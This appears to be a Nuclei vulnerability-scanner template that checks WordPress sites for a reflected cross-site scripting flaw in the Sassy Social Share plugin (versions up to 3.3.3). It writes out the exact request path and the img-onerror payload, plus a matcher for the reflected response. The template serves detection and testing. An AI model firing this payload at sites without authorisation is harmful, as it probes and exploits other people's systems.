2020-10-22 20:38:55 +00:00
|
|
|
id: sassy-social-share-xss
|
2020-10-20 15:28:01 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Sassy Social Share XSS
|
|
|
|
author: Random-Robbie
|
|
|
|
severity: medium
|
|
|
|
description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS)
|
2021-02-16 17:02:57 +00:00
|
|
|
tags: wordpress,wp-plugin
|
2020-10-20 15:28:01 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]="
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '{"facebook_urls":[{"<img src=x onerror=alert(document.domain)>":""}],"status":1,"message":{"":{"twitter":0}}}'
|
2020-10-22 20:38:55 +00:00
|
|
|
part: body
|